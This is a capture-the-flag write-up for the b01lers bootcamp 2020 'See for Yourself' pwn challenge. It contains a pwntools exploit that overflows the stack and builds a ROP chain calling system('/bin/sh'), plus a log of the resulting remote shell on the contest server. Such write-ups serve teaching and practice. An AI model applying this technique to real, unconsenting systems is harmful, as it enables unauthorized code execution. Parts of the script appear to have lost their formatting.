Tags: bof pwn 


# b01lers bootcamp CTF 2020

## See for Yourself

> 200
> The matrix requires a more advanced trick this time. Hack it.
> `nc chal.ctf.b01lers.com 1008`
> [simplerop](simplerop)
> [simplerop.c](simplerop.c)

Tags: _pwn_ _x86-64_ _remote-shell_ _bof_ _rop_

## Summary

Very basic ROP, with parts included.

## Analysis

### Checksec

Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

Not a lot in place. Perfect for ROP.

### Decompile with Ghidra

int main(void)
char *shellcode [1];

setvbuf(stdout,(char *)0x0,2,0);
setvbuf(stderr,(char *)0x0,2,0);
system((char *)0x0);
puts("Unfortunately, no one can be told what the Matrix is. You have to see it for yourself.");
return 0;

The binary comes with `system` "built-in". The question is, _is `/bin/sh` also there?_

# strings simplerop | grep /bin/sh


All that we need to know how is how far `shellcode` is from the return address on the stack:

char *[1] Stack[-0x8]:8 shellcode


## Exploit

#!/usr/bin/env python3

from pwn import *

binary = context.binary = ELF('./simplerop')
binary.plt['system'] = 0x401080 # see .plt.sec in ghidra or GDB output
context.log_level = 'INFO'

if not args.REMOTE:
context.log_file = 'local.log'
p = process(binary.path)
context.log_file = 'remote.log'
p = remote('chal.ctf.b01lers.com', 1008)

rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]

payload = 0x8 * b'A'
payload += p64(pop_rdi + 1)
payload += p64(pop_rdi)
payload += p64(binary.search(b'/bin/sh').__next__())
payload += p64(binary.plt.system)


Normally I get any linked in function with `binary.plt.functionname`, but newer libc I assume moved that to `.plt.sec` and pwntools does not search that (yet). After finding with Ghidra and checking with GDB, I just manually added the location.

The rest is standard fare CTF no-PIE ROP:

1. Find a `pop rdi` gadget
2. Create a payload to call `system`

> The `pop_rdi + 1` = `ret` and is there to align the stack for `system`.


# ./exploit.py REMOTE=1
[*] '/pwd/datajerk/b01lersbootcampctf2020/see_for_yourself/simplerop'
Arch: amd64-64-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to chal.ctf.b01lers.com on port 1008: Done
[*] Loaded 13 cached gadgets for './simplerop'
[*] Switching to interactive mode
Unfortunately, no one can be told what the Matrix is. You have to see it for yourself.
$ id
uid=1000(simplerop) gid=1000(simplerop) groups=1000(simplerop)
$ ls -l
total 36
-r-xr-x--- 1 root simplerop 89 Oct 2 18:33 Makefile
-r--r----- 1 root simplerop 24 Oct 2 18:33 flag.txt
-r-xr-x--- 1 root simplerop 19672 Oct 3 04:08 simplerop
-r-xr-x--- 1 root simplerop 339 Oct 2 18:33 simplerop.c
-r-xr-x--- 1 root simplerop 47 Oct 2 18:33 wrapper.sh
$ cat flag.txt

Original writeup (https://github.com/datajerk/ctf-write-ups/tree/master/b01lersbootcampctf2020/see_for_yourself).